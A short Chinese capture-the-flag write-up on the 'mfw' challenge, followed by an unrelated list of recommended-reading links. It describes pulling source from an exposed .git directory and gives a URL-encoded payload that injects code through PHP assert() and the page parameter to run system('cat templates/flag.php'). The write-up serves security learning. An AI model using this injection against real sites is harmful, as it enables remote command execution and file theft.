ctf ctf - 锐客网

1.mfw（git+assert+strops）

文章图片

【ctf】页面中的所有连接都是通过控制page变量实现的。
about里的git库，因此可以通过githack将源码下载出来。

文章图片

在index.php中存在这样一段源码。

assert（）：
assert这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;
$hsy=123;
assert("is_int($hsy)");
?>//返回true
$file="templates/" .$page. ".php"
这里的file参数与我们输入的page有关，构造 about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag')

payload:url?page=%20about.php%27%2C%20%27123%27%29%20%3D%3D%3D%20false%20and%20system%28%27cat%20templates%2fflag.php%27%29%20and%20strpos%28%27templates%2fflag%27%29
2.Cat

转载于:https://www.cnblogs.com/sylover/p/11218590.html

ctf

推荐阅读

非洲草原所有动物名单非洲大草原上的动物

荣耀V20和荣耀20有什么区别,哪个性价比更高？

如何救助被泥石流伤害的人员

河北师范大学招生办公室河北师范大学招生办电话号码

Word如何固定表格表名，word怎么固定表格

我是特种兵之利刃出鞘大结局我是特种兵之利刃出鞘大结局剧情大结局完整播放

秋天喝凉茶伤脾伤胃伤肠道

[RK3288][Android6.0] RTC模块RX8010SJ驱动添加及改动

土豆怎么保存不发芽

创业直播录屏，直播录屏算原创吗

如何在牛仔裤上磨烂皮肤如何在牛仔裤上磨烂，如何在牛仔裤上磨烂布

服务器怎么查看磁盘内存服务器怎么查看磁盘

想买一个单反,请问索尼有什么推荐的产品？

如何在魅族手机上登录云服务器？魅族手机怎么登录云服务器

请问鲍鱼买回家可以养多久

小开头的三个字网名搞笑小开头的三个字网名

夫妻债务新司法解释夫妻债务新司法解释2018溯及力

灶台风水朝向西最吉利灶台风水朝向西是不是最吉利

我的世界fill怎么玩？

《汉字找茬王》找出最近的热梗通关攻略